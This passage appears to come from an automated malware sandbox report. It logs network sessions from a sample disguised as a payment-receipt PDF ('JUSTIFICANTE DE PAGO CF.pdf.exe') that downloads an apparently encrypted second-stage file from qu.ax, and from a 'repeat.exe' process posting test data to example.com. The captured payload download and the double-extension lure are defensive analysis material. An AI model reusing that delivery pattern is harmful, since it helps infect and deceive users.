                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62
                                                                              Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                              Feb 21, 2024 21:09:23.737008095 CET312INData Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
                                                                              Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.54973293.184.216.34806844C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2024 21:09:30.124417067 CET172OUTPOST /recepticle.aspx HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: www.example.com
                                                                              Content-Length: 25
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2024 21:09:30.211880922 CET25INHTTP/1.1 100 Continue
                                                                              Feb 21, 2024 21:09:30.212404966 CET25OUTData Raw: 74 68 69 6e 67 31 3d 68 65 6c 6c 6f 26 74 68 69 6e 67 32 3d 77 6f 72 6c 64
                                                                              Data Ascii: thing1=hello&thing2=world
                                                                              Feb 21, 2024 21:09:30.364942074 CET652INHTTP/1.1 404 Not Found
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:30 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:30 GMT
                                                                              Server: EOS (vny/0451)
                                                                              Content-Length: 433
                                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.54973493.184.216.34806844C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2024 21:09:31.785970926 CET56OUTGET /recepticle.aspx HTTP/1.1
                                                                              Host: www.example.com
                                                                              Feb 21, 2024 21:09:31.873991966 CET1286INHTTP/1.1 404 Not Found
                                                                              Accept-Ranges: bytes
                                                                              Age: 366114
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:31 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:31 GMT
                                                                              Last-Modified: Sat, 17 Feb 2024 14:27:37 GMT
                                                                              Server: ECS (nyb/1D29)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: 404-HIT
                                                                              Content-Length: 1256
                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62
                                                                              Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                              Feb 21, 2024 21:09:31.874003887 CET312INData Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
                                                                              Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.54970645.83.31.1874432360C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-02-21 20:08:49 UTC63OUTGET /HCHP.pdf HTTP/1.1
                                                                              Host: qu.ax
                                                                              Connection: Keep-Alive
                                                                              2024-02-21 20:08:49 UTC356INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Wed, 21 Feb 2024 20:08:49 GMT
                                                                              Content-Type: application/pdf
                                                                              Content-Length: 729088
                                                                              Connection: close
                                                                              Last-Modified: Wed, 21 Feb 2024 16:34:15 GMT
                                                                              Cache-Control: public, max-age=2592000
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                              Accept-Ranges: bytes
                                                                              2024-02-21 20:08:49 UTC16028INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              2024-02-21 20:08:49 UTC16384INData Raw: 9b 74 c0 e3 8d 71 be 07 f7 b7 2f 7e fc f9 a0 2d df 41 6b d3 b9 b2 c2 e1 df 8e 43 3e 4b c0 0e e5 87 0c 65 91 1f 2a 8d d3 c5 fd 41 09 71 11 d5 66 e6 4b 13 53 cf 81 11 92 aa f8 6f 71 a5 20 e7 32 2e a9 dc bf b3 6c 9b 88 6f 42 73 ba 49 e2 d1 b7 38 29 c8 26 28 60 b0 dc e2 4e 9f d1 33 16 ec 3c 65 20 2b af b1 e9 6c d3 7f 0f 08 7b ef 78 32 c3 7a 5d fe b2 36 77 49 b3 6b ca 70 ad a7 70 1a 9c 35 0c ea cf c3 75 1e 2e cc 8b db 4a 8a a7 b2 fa 53 61 9d cc a8 c9 fb 65 79 ba 7d a0 78 d1 c9 77 36 73 55 27 e9 4e 48 bd f8 6b 72 ff 4b c3 aa f1 8d 14 69 d1 e5 32 55 46 d6 d8 60 d4 a4 75 be 50 a6 22 14 f1 a6 d9 84 8b e5 16 78 86 cb 4f 1e b7 0a 07 b8 40 e8 c7 2d 4b 81 6a 98 27 e2 58 68 6d 95 6f bd 28 46 a0 a5 e1 9b c1 e8 32 84 db de 07 34 ef 38 50 2d 15 81 3b 05 4e 38 93 bd fb 52
                                                                              Data Ascii: tq/~-AkC>Ke*AqfKSoq 2.loBsI8)&(`N3<e +l{x2z]6wIkpp5u.JSaey}xw6sU'NHkrKi2UF`uP"xO@-Kj'Xhmo(F248P-;N8R
                                                                              2024-02-21 20:08:49 UTC16384INData Raw: 11 c7 28 d0 54 13 c7 56 eb 69 26 97 dc b2 84 1b 01 1e 12 db fe ea 93 74 a4 8b 03 cf 86 8e 8e f1 4d d6 3a 5d 2b c5 72 a6 81 40 75 2f 9c f5 b6 dc 7d 7f 9a 90 db ff 9e 8f 6a a4 d9 04 67 77 3f 41 e7 5e e1 8a 05 8d 14 30 a7 a2 2c 5a 52 03 f7 df 98 fe 84 8d 62 37 28 cc f7 c3 66 d1 71 2b 68 b9 ce c5 3b 75 ff 39 dd 4b 12 b5 13 d4 35 e4 16 0e 98 d8 c0 29 4e 56 2f 01 39 ff 25 1e b5 dd 95 1a 7a 3a b5 c1 d9 6a ab 2e 2e cc 21 0e 98 35 e0 af 47 5a 8b fb 78 cc 31 05 15 cc 48 b5 e1 02 ea e4 d1 25 01 ea 99 5a be e1 e6 1f 3a 8f bb 49 e4 47 d8 63 2b 11 51 52 e2 2d d2 2c 79 63 11 c4 05 b5 92 8a 96 b6 d0 94 b5 e0 b7 2b 7b cc 7f 7e a4 5d d2 4c f2 9c 81 e1 24 e6 01 b4 ac f7 f0 c9 aa e8 4d 63 71 86 b1 f4 d6 2d 5c 5e b4 8d ba c7 7f 93 3c 9f 3d 22 cf 5e cf 2a 98 bd a0 97 7a a6 56
                                                                              Data Ascii: (TVi&tM:]+r@u/}jgw?A^0,ZRb7(fq+h;u9K5)NV/9%z:j..!5GZx1H%Z:IGc+QR-,yc+{~]L$Mcq-\^<="^*zV
                                                                              2024-02-21 20:08:49 UTC16384INData Raw: 95 ff eb b8 11 77 87 e2 81 cd 3b 02 7d 69 4c ad fb c7 93 bc f9 84 22 36 1c f8 64 a0 38 4e e9 7d 80 c2 e4 1e 55 e2 bb 04 9a f9 d5 af 36 77 15 cb 68 cd 3a ac c7 be bd a9 16 0a 79 68 b3 58 18 22 34 49 b4 15 6d 4e 2b c1 67 64 19 4c 66 f9 72 2b 5f f2 08 46 86 58 37 ac c2 e2 60 53 61 1d 01 35 a0 05 7d 9f ba e1 f9 cf 66 e2 53 0b de 5e 52 fd 13 26 aa 34 29 2c 7f ec 3d 9a 04 4f 54 c5 cc 70 06 ca b1 20 38 cb c6 4d 3e dd fa db e8 cd 23 05 e7 7c fb 7d ce 44 47 b6 6d d1 df 43 e4 40 a5 61 4d 10 c7 40 81 52 d6 15 eb 98 31 64 c4 db ec 4a ef 10 73 9a 16 f1 64 ef 97 e5 a6 17 2e 4a c7 c3 67 a7 ed 53 fd f9 93 9e 97 06 c7 3a ba 46 ed 49 4c b1 bd ff 8d 5b 08 80 22 bc ae 08 d0 4b c6 73 dd 77 c4 6e ba 24 cd 1e 00 fc e2 27 1c e0 cf 6c 9e 58 90 46 2f a7 03 87 4c f4 2f 7e fa 25 b1
                                                                              Data Ascii: w;}iL"6d8N}U6wh:yhX"4ImN+gdLfr+_FX7`Sa5}fS^R&4),=OTp 8M>#|}DGmC@aM@R1dJsd.JgS:FIL["Kswn$'lXF/L/~%
                                                                              2024-02-21 20:08:49 UTC16384INData Raw: 66 e6 d0 55 67 89 50 fd c9 26 5b 77 33 7f e4 b7 c6 24 d5 a0 b9 cb 4b 0a f5 00 e4 3b fe 66 b2 29 cb 7b 03 62 0e 89 02 ee b7 ca 54 f1 8a 93 8b 11 5f 58 d3 7c d1 16 46 ef 57 b1 8b ee 52 ad 09 66 cf d0 b4 70 92 e4 9b be b5 1b b9 cc 40 fc 37 be d1 25 dd 3a 4c eb 29 c2 a1 e9 dd 74 24 49 5d be 82 ae e2 03 22 04 e7 e3 e6 35 4c 6d 22 ca 91 38 0c 23 8e 19 c6 d3 5f 25 37 cd 7e ee b2 d6 37 c0 17 e4 11 4f c8 11 ac e4 7f 68 ff b6 c2 09 46 76 90 c4 40 ca 21 58 89 e4 3e c1 b0 2f f3 af a7 e5 25 2e 45 1e d0 d9 dd a5 fe d7 b9 03 ff 50 2f 1a fb 55 ed 24 04 31 b9 d2 31 6c 49 29 bc d8 30 37 73 07 0a a7 fc 36 35 86 6c 01 43 24 72 bb 01 96 f5 7f 5f 59 a7 f9 eb 84 dc 51 d2 2f 97 5c c4 87 00 6f a7 2e 65 6a bf d5 b9 0b db 6d 35 55 aa 06 ce 4a 56 7b c4 39 ea 13 e8 68 7d 73 e7 59 2b
                                                                              Data Ascii: fUgP&[w3$K;f){bT_X|FWRfp@7%:L)t$I]"5Lm"8#_%7~7OhFv@!X>/%.EP/U$11lI)07s65lC$r_YQ/\o.ejm5UJV{9h}sY+
                                                                              2024-02-21 20:08:49 UTC16384INData Raw: d4 c1 b0 02 49 fc 31 ac 55 34 05 de 86 29 bd ff d7 50 99 4a 39 d1 50 b6 e1 c6 a9 71 6c e8 a6 0d 3d 3b e2 29 80 6f d8 93 9e 2a 59 3d 5d ef 6d 82 00 84 0c 9f cf 28 45 99 6d 33 ca 02 57 d9 55 5c 17 99 cc 65 43 77 28 be 2a ef 66 36 6a b5 8e b9 6d a9 2f 8f f7 6c f0 d1 a2 fe 8d 8d b3 01 f8 7e 89 ec f9 45 c8 2a ab a7 f9 05 e8 46 59 31 f6 76 3a b5 e8 63 b6 b3 35 4d 06 90 d0 74 dc 77 b0 34 a5 ac da c0 1d 08 73 75 db 8d c9 aa 17 51 78 1b e2 81 27 39 41 29 63 0a 0f a7 70 29 7b 39 1e b4 15 63 1c 53 5a 47 ce eb e8 b5 7b 24 48 46 b9 90 7c 1d c3 a6 77 91 b1 69 19 48 23 37 14 9f d3 15 8a d3 ed f0 57 19 98 18 f5 eb 2c a1 c3 8c db df 2f 17 ea a6 93 a5 44 b3 7d a0 ac 9a f6 9a dc 69 3f 82 2e 2a 9e e3 c3 b9 c4 22 da 1f 79 3d 04 de 22 f3 b4 29 5d 64 4d a8 b0 4e 6a fe fd d4 0e
                                                                              Data Ascii: I1U4)PJ9Pql=;)o*Y=]m(Em3WU\eCw(*f6jm/l~E*FY1v:c5Mtw4suQx'9A)cp){9cSZG{$HF|wiH#7W,/D}i?.*"y=")]dMNj
                                                                              2024-02-21 20:08:49 UTC16384INData Raw: 1c c8 22 eb 70 2c b9 66 98 09 df 9f 75 fb 0f 99 1f 20 d1 29 a4 e4 42 28 6c 5e 4c d8 db 17 8f 84 3e 95 b4 45 dd 70 6c 57 93 98 f7 80 b2 af 3f 59 5f cf df 19 0b 42 89 a7 7e 36 10 8e 56 a0 5e 99 41 ae 64 f6 2e c7 db 3d 66 08 c4 19 dc c2 ee 9f d4 c9 11 0a 66 aa a4 19 b8 62 db 5f 65 40 47 07 b2 f6 bd c1 27 71 d0 f4 13 9c 93 1c 37 a5 1b 3c e8 1b 63 1b 93 5a 7e cf b3 ae 93 9c 9b 11 9e f9 07 b7 c8 c8 32 65 8a 93 4e 61 61 cd f9 11 45 fd 93 3c 52 a3 b2 17 7f 6c d8 2c c3 45 44 35 cd 09 3a 32 f9 a5 e1 e7 31 51 c2 2b d2 c9 d3 8c 74 6e 23 c8 24 bf 70 a2 65 10 d1 ec 74 25 1e 0f 7e ef 8e cc 2a 2e 5f 8c 3a c2 a8 42 7f 2a f3 e5 a6 97 4e 5b d5 70 04 de 17 ba fa 56 05 8e 42 c6 6c e5 5c 07 5b 79 ed 7c e4 a5 bd 3b b0 c2 86 98 fd 1d e1 e3 ca 37 fb 96 c0 5b 0d 47 a8 93 e6 6a 62
                                                                              Data Ascii: "p,fu )B(l^L>EplW?Y_B~6V^Ad.=ffb_e@G'q7<cZ~2eNaaE<Rl,ED5:21Q+tn#$pet%~*._:B*N[pVBl\[y|;7[Gjb
                                                                              2024-02-21 20:08:49 UTC16384INData Raw: 6d 0a f4 a2 68 03 8c 1e c4 a0 48 5e 7b 38 7e d9 a3 04 88 5a 31 eb db 4c 78 66 da 33 1c 6c ec 6b 8d d5 63 13 5f 2a 9a d9 8a ef fd 8c c3 48 e5 0b b7 7e f9 42 9e 2b 9b d1 79 1c a2 76 86 06 12 e8 48 6e d1 a6 90 9a 47 70 0f 35 17 70 8b 58 f0 2f b6 a2 0d 68 c2 8e 8d 62 c5 32 c1 19 66 91 5b 57 e9 1a 4f 81 17 97 30 46 48 25 5c ff 1c 08 0b 18 86 25 b2 25 50 ed f3 e3 c9 34 2c b0 79 93 1e 1f 03 95 11 80 1c 29 44 3e 2a 21 92 6a 28 79 b0 9f ac 11 e2 79 5e 0c e3 20 0d 5b 1e 06 1e 4e bf 65 f9 54 eb 53 97 a5 7a e2 0b 6e b9 ff 01 8d 14 d6 39 3e 16 78 9d 0d d2 46 e6 43 2c 8c 2b 4a e9 c4 fd fd 9d e4 a0 0f 26 3d 4f ed d8 7a 1c 07 7f 98 c3 ea cd 26 99 de f8 ee 6c c4 84 57 8e 32 b0 fb 05 f7 5a 05 c5 d9 80 83 e7 cc 4e 75 0e 00 46 70 54 a9 94 bf d2 d3 2f fc 74 09 16 87 a6 6e 4f
                                                                              Data Ascii: mhH^{8~Z1Lxf3lkc_*H~B+yvHnGp5pX/hb2f[WO0FH%\%%P4,y)D>*!j(yy^ [NeTSzn9>xFC,+J&=Oz&lW2ZNuFpT/tnO
                                                                              2024-02-21 20:08:49 UTC16384INData Raw: 13 c1 3f 19 67 77 40 79 a5 df 95 1e ec 0a 13 b0 13 06 ba d2 48 7a c1 bf 22 ae 3c f7 35 30 93 a0 ea f1 c8 13 d1 20 77 68 bd d4 c6 b3 c4 6f 7d d2 78 2b 24 4b 63 5f 2c ad c2 2f ec da fc 40 4d 6a 23 d4 cf 7f ce b3 38 04 02 f3 82 72 f3 fe 22 3d 86 1c 50 9f 0a 4b 9e c8 4e d3 5a 69 7c f5 18 5f 49 4b 53 e6 d7 d6 c4 ad 4e d1 c1 a6 d8 5b 5a b1 44 99 85 a1 2b c1 b7 49 5d aa 8b 26 48 68 5c cd af 65 83 fc 6f 9c 63 b0 3d 5c 4e 8a 3d 81 8e 79 94 16 4d 3f 47 f3 cc ea 8a a0 87 5d 00 0c 73 3c bf c3 be ab dc c3 e1 e5 69 9a 88 f3 37 dc 35 73 68 64 e2 6d d1 10 8e 05 54 ea 34 e2 7f f5 3f fc b2 53 ea 1d b2 43 fb 2c 10 2b 3e 93 cf ee 66 ed 6f ba 17 04 6b 25 50 8d be 9e e7 83 0b fa e8 97 1b da 9d 64 48 1b a5 37 e0 82 72 25 7e 35 90 60 ee 04 c8 81 9a d6 a2 a1 81 96 23 64 d9 